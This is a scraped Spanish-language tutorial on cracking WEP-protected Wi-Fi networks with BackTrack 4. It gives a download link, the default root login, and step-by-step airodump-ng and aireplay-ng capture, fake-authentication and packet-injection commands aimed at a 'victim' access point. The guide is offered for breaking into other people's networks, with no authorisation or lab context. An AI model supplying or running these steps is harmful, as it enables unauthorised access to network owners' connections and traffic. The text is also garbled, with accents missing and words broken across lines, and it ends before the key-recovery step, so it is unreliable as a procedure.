Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Back Track
Back Track
Bajar
el BACKTRACK
4 lo
pueden
bajar
aqu
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
2. Obviamente lo queman en un DVD y luego botean desde el DVD ojo se inicia solo le dan a enter en la primera pantalla , luego empezara
a cargar ficheros , les pedir una clave es la siguiente : Login: root Pass: toor Luego cuando pida comando escriben startx
3. Una vez dentro buscamos en el "inicio" una aplicacin llamada konsole . 4. Escribe ifconfig luego buscas tu interfaz de red que puede llamarse wlan0, rausb, eth0 etc... y buscas adonde dice hardware adress :
anotas ese numero . ojo. el nmero llega hasta los 00 del final. Esa es tu direccin Mac luego cierras esa ventana.
5. Abrimos
otra konsole y escribimos: airodump-ng wlan0 y seleccionas la red a atacar. de ella copias el Mac, bssid y el canal. cierras la ventana.
(tu
interfaz
de
red)
6. Abrimos otra konsole y escribimos: airodump-ng -c 6(canal de la victima) -w prueba (Nombre que le quieras dar al archivo de las capturas)
--bssid 66:77:88:99:00:11(Mac de la victima) wlan0 (tu interfaz de red), con esto solo te aparecer el AP de tu victima, fjate en donde dice DATA... esa cifra tiene que llegar a 15.000 o mas para comenzar a decriptar la clave.
7. Para acelerar este proceso ya que es muy lento o simplemente no manda DATA necesitamos abrir otra konsole dejando la anterior
abierta. y ah escribimos : aireplay-ng -1 0 -a 66:77:88:99:00:11(Mac del victima) -h 00:11:22:33:44:55(Mac tuya) -e ejemplo(bssid de la red que atacamos sea el nombre) wlan0(tu interfaz de red)
8. En este momento deberas empezar a recibir DATA mas rpido... pero en algunos casos demora mas poque no hay trafico de red ...
luego se este paso podemos acelerar aun mas el proceso inyectndole trafico a el router con el siguiente comando: aireplay-ng -3 -b 66:77:88:99:00:11(Mac victima) -h 00:11:22:33:44:55(tu Mac) wlan0(tu interfaz de red) Con eso debera ir muy rpido recibiendo data... luego cuando tengas sobre 15.000 no cierres la konsole y abre otra.
Bueno eso fue como sacar claves wep sin tanto rodeo ni cosas extraas. Pero repito hay routers que tienen mas proteccin o que mandan DATA mas lento y solo es cosa de esperar... ah y lo ultimo no funciona con routers con encriptacin TKIP o WPA2 que a mi juicio son las mas seguras del mundo.